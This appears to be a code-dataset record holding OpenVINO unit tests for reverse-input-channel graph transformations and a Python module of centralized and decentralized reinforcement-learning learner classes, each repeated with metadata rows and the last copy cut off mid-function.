def test_lift_up_through_pad2(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels:0', '0:result'),
*connect('reverse_channels:0', '0:result2')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
def test_pass_rc_through(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', '0:pad'),
*connect('pad_const_1', '1:pad'), *connect('pad_const_2', '2:pad'),
*connect('pad', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationDown.pass_rc_through_zero_port_only(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder'])
def test_lift_up_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_up_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
reverse_channels.axis = int64_array(-3)
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
reverse_channels.axis = int64_array(-1)
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_insert(self):
graph = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_old_api_map(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
node = Node(graph, 'placeholder1')
old_api_map = OldAPIMapOrder(version=0)
node.rt_info.info[('old_api_map_order', old_api_map.get_version())] = old_api_map
node.rt_info.info[('old_api_map_order', old_api_map.get_version())].old_api_transpose_parameter([0, 2, 3, 1])
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
node2 = Node(graph_ref, 'placeholder1')
node2.rt_info = node.rt_info
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_layout(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True,
layout_values={
'placeholder1': {'source_layout': 'nhwc', 'target_layout': None}}))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
| 54.041667
| 120
| 0.593678
|
import unittest
from argparse import Namespace
import numpy as np
from openvino.tools.mo.back.ReverseInputChannels import ReverseChannelsPropagationUp, ReverseChannelsPropagationDown, \
InsertReverseChannels
from openvino.tools.mo.front.common.partial_infer.utils import int64_array, float32_array
from openvino.tools.mo.graph.graph import Node, Graph
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from openvino.tools.mo.utils.runtime_info import OldAPIMapOrder, RTInfo
from unit_tests.utils.graph import build_graph, result, connect, regular_op_with_shaped_data, valued_const_with_data
nodes = {
**regular_op_with_shaped_data('placeholder1', [1, 3, 10, 10], {'type': 'Parameter', 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter'}),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**result('result'),
}
nodes2 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**valued_const_with_data('mul_const', float32_array([-127.5, -127.5, -127.5])),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**valued_const_with_data('pad_const_1', int64_array([0, 0, 0, 0])),
**valued_const_with_data('pad_const_2', int64_array([0, 0, 1, 1])),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
nodes3 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**regular_op_with_shaped_data('transpose', [1, 3, 10, 10], {'type': 'Transpose'}),
**valued_const_with_data('transpose_order', int64_array([0, 3, 1, 2])),
**regular_op_with_shaped_data('reverse_channels_up', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(3)}),
**regular_op_with_shaped_data('reverse_channels_down', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
def get_nodes(shape, axis=1):
return {
**regular_op_with_shaped_data('placeholder1', shape,
{'type': 'Parameter', 'shape': shape, 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter', 'shape': [1, 1, 1, 1]}),
**regular_op_with_shaped_data('mul', shape, {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', shape,
{'op': 'ReverseChannels', 'type': None, 'axis': int64_array(axis)}),
**regular_op_with_shaped_data('pad', shape, {'type': 'Pad'}),
**result('result'),
}
class ReverseInputChannelsTest(unittest.TestCase):
def check_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
self.assertTrue(out_node['fw_tensor_debug_info'] == ['fw_name', 0])
else:
for idx in node.out_nodes():
out_node = node.out_node(idx)
self.assertFalse('fw_tensor_debug_info' in out_node)
def set_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
out_node['fw_tensor_debug_info'] = ['fw_name', 0]
def test_lift_up_through_eltwise(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_eltwise_broadcast(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
placeholder_node = Node(graph, 'placeholder2')
placeholder_node.out_port(0).data.set_shape([])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_pad(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
def test_lift_up_through_pad2(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels:0', '0:result'),
*connect('reverse_channels:0', '0:result2')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
def test_pass_rc_through(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', '0:pad'),
*connect('pad_const_1', '1:pad'), *connect('pad_const_2', '2:pad'),
*connect('pad', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationDown.pass_rc_through_zero_port_only(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder'])
def test_lift_up_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_up_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
reverse_channels.axis = int64_array(-3)
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
reverse_channels.axis = int64_array(-1)
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_insert(self):
graph = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_old_api_map(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
node = Node(graph, 'placeholder1')
old_api_map = OldAPIMapOrder(version=0)
node.rt_info.info[('old_api_map_order', old_api_map.get_version())] = old_api_map
node.rt_info.info[('old_api_map_order', old_api_map.get_version())].old_api_transpose_parameter([0, 2, 3, 1])
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
node2 = Node(graph_ref, 'placeholder1')
node2.rt_info = node.rt_info
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_layout(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True,
layout_values={
'placeholder1': {'source_layout': 'nhwc', 'target_layout': None}}))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
| true
| true
|
1c3e9590f25c453699d93c4863127de74e780963
| 7,493
|
py
|
Python
|
starter_code/learner/learners.py
|
mbchang/societal-decision-making
|
23fd6de4df33f985d360330a9d5a2c29faeb8e52
|
[
"MIT"
] | 38
|
2020-08-17T14:18:22.000Z
|
2022-02-27T13:12:40.000Z
|
starter_code/learner/learners.py
|
mbchang/societal-decision-making
|
23fd6de4df33f985d360330a9d5a2c29faeb8e52
|
[
"MIT"
] | 3
|
2021-06-08T22:17:35.000Z
|
2022-03-12T00:46:27.000Z
|
starter_code/learner/learners.py
|
mbchang/societal-decision-making
|
23fd6de4df33f985d360330a9d5a2c29faeb8e52
|
[
"MIT"
] | 3
|
2020-08-21T05:28:35.000Z
|
2022-03-31T17:07:48.000Z
|
from collections import OrderedDict
from starter_code.learner.learner import Learner
from starter_code.infrastructure.log import log_string, MinigridEnvManager
from starter_code.interfaces.transitions import AgentStepInfo, OptionStepInfo, AuctionStepInfo, OptionAuctionStepInfo
from starter_code.sampler.decentralized_sampler import DecentralizedSampler
from starter_code.sampler.domain_specific_temporary_buffers import DecentralizedHRLStatsCollector, DecentralizedTabularStatsCollector
from starter_code.sampler.hierarchy_utils import is_hierarchical
from starter_code.sampler.sampler import Sampler
from starter_code.sampler.temporary_buffer import DecentralizedStatsCollector, StatsCollector
def computation_sampler_builder(base_class):
class ComputationSampler(base_class):
def finish_episode(self, state, episode_data, env):
output = state
reward = env.apply_loss(output).item()
# assign reward to last step
episode_data[-1].hierarchy_info.set_reward(reward)
episode_data[-1].set_reward(reward)
episode_data = base_class.finish_episode(self, state, episode_data, env)
return episode_data
return ComputationSampler
class CentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(Sampler)
else:
sampler_builder = Sampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionStepInfo
else:
step_info = AgentStepInfo
self.stats_collector_builder = StatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
class DecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(DecentralizedSampler)
else:
sampler_builder = DecentralizedSampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
# domain specific
if 'BabyAI' in args.env_name[0]:
self.stats_collector_builder = DecentralizedHRLStatsCollector
else:
self.stats_collector_builder = DecentralizedStatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
Learner.get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i)
if env_manager.visual and isinstance(env_manager, MinigridEnvManager):
"""
time t | state | high-level action | high-level winner | high-level bids | high-level payoffs | high-level reward | low-level action | next_state | low-level reward |
time t+1 | state | high-level action | high-level winner | high-level bids | high-level payoffs | high-level reward | low-level action | next_state | low-level reward |
"""
print_keys = ['Epoch', epoch]
print_values = []
def low_level_print(organism, episode_data, high_level_info_dict=None):
time=0
for step in episode_data:
if not step.hierarchy_info.leaf:
sub_organism = organism.transformations[step.hierarchy_info.organism]
high_level_info_dict = dict(
action=step.action,
winner=step.winner,
bids=['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step.bids.items()],
payoffs=['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step.payoffs.items()],
reward=str(step.reward),
t=time)
low_level_time = low_level_print(sub_organism, step.hierarchy_info.path_data, high_level_info_dict)
time+=low_level_time
else:
step_dict = OrderedDict(
t=str(time+high_level_info_dict['t']),
high_level_action = high_level_info_dict['action'] ,
high_level_winner = high_level_info_dict['winner'],
high_level_bids = high_level_info_dict['bids'],
high_level_payoffs = high_level_info_dict['payoffs'],
high_level_reward = high_level_info_dict['reward'] ,
low_level_action=step.action,
low_level_reward=str(step.reward),
room_num = step.state.room
)
keys, values = [], []
for key, value in step_dict.items():
keys.append(key)
values.append(value)
print_values.append(values)
self.logger.printf(log_string(step_dict))
time+=1
return time
low_level_print(self.organism, episode_data)
self.logger.save_print_csv(print_keys, print_values)
class TabularDecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
self.stats_collector_builder = DecentralizedTabularStatsCollector
self.sampler = DecentralizedSampler(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
"""
| time t | state | action | winner | bids | payoffs |
| time t+1 | state | action | winner | bids | payoffs |
"""
for t, step_data in enumerate(episode_data):
step_dict = OrderedDict(
t='{}\t'.format(t),
state=env_manager.env.from_onehot(step_data.state),
action=step_data.action,
next_state=env_manager.env.from_onehot(step_data.next_state),
reward='{}\t'.format(step_data.reward),
mask=step_data.mask)
if hasattr(step_data, 'bids'):
assert hasattr(step_data, 'payoffs') and hasattr(step_data, 'winner')
step_dict['winner'] = step_data.winner
step_dict['bids'] = ', '.join(['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step_data.bids.items()])
step_dict['payoffs'] = ', '.join(['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step_data.payoffs.items()])
self.logger.printf(log_string(step_dict))
| 48.341935
| 180
| 0.613506
|
from collections import OrderedDict
from starter_code.learner.learner import Learner
from starter_code.infrastructure.log import log_string, MinigridEnvManager
from starter_code.interfaces.transitions import AgentStepInfo, OptionStepInfo, AuctionStepInfo, OptionAuctionStepInfo
from starter_code.sampler.decentralized_sampler import DecentralizedSampler
from starter_code.sampler.domain_specific_temporary_buffers import DecentralizedHRLStatsCollector, DecentralizedTabularStatsCollector
from starter_code.sampler.hierarchy_utils import is_hierarchical
from starter_code.sampler.sampler import Sampler
from starter_code.sampler.temporary_buffer import DecentralizedStatsCollector, StatsCollector
def computation_sampler_builder(base_class):
class ComputationSampler(base_class):
def finish_episode(self, state, episode_data, env):
output = state
reward = env.apply_loss(output).item()
episode_data[-1].hierarchy_info.set_reward(reward)
episode_data[-1].set_reward(reward)
episode_data = base_class.finish_episode(self, state, episode_data, env)
return episode_data
return ComputationSampler
class CentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(Sampler)
else:
sampler_builder = Sampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionStepInfo
else:
step_info = AgentStepInfo
self.stats_collector_builder = StatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
class DecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'FunctionTransformation':
sampler_builder = computation_sampler_builder(DecentralizedSampler)
else:
sampler_builder = DecentralizedSampler
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
if 'BabyAI' in args.env_name[0]:
self.stats_collector_builder = DecentralizedHRLStatsCollector
else:
self.stats_collector_builder = DecentralizedStatsCollector
self.sampler = sampler_builder(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
Learner.get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i)
if env_manager.visual and isinstance(env_manager, MinigridEnvManager):
print_keys = ['Epoch', epoch]
print_values = []
def low_level_print(organism, episode_data, high_level_info_dict=None):
time=0
for step in episode_data:
if not step.hierarchy_info.leaf:
sub_organism = organism.transformations[step.hierarchy_info.organism]
high_level_info_dict = dict(
action=step.action,
winner=step.winner,
bids=['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step.bids.items()],
payoffs=['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step.payoffs.items()],
reward=str(step.reward),
t=time)
low_level_time = low_level_print(sub_organism, step.hierarchy_info.path_data, high_level_info_dict)
time+=low_level_time
else:
step_dict = OrderedDict(
t=str(time+high_level_info_dict['t']),
high_level_action = high_level_info_dict['action'] ,
high_level_winner = high_level_info_dict['winner'],
high_level_bids = high_level_info_dict['bids'],
high_level_payoffs = high_level_info_dict['payoffs'],
high_level_reward = high_level_info_dict['reward'] ,
low_level_action=step.action,
low_level_reward=str(step.reward),
room_num = step.state.room
)
keys, values = [], []
for key, value in step_dict.items():
keys.append(key)
values.append(value)
print_values.append(values)
self.logger.printf(log_string(step_dict))
time+=1
return time
low_level_print(self.organism, episode_data)
self.logger.save_print_csv(print_keys, print_values)
class TabularDecentralizedLearner(Learner):
def __init__(self, organism, rl_alg, logger, device, args):
Learner.__init__(self, organism, rl_alg, logger, device, args)
if organism.transformation_type == 'SubpolicyTransformation':
step_info = OptionAuctionStepInfo
else:
step_info = AuctionStepInfo
self.stats_collector_builder = DecentralizedTabularStatsCollector
self.sampler = DecentralizedSampler(
organism=organism,
step_info=step_info,
deterministic=False,
)
def get_qualitative_output(self, env_manager, sampler, episode_data, epoch, i):
for t, step_data in enumerate(episode_data):
step_dict = OrderedDict(
t='{}\t'.format(t),
state=env_manager.env.from_onehot(step_data.state),
action=step_data.action,
next_state=env_manager.env.from_onehot(step_data.next_state),
reward='{}\t'.format(step_data.reward),
mask=step_data.mask)
if hasattr(step_data, 'bids'):
assert hasattr(step_data, 'payoffs') and hasattr(step_data, 'winner')
step_dict['winner'] = step_data.winner
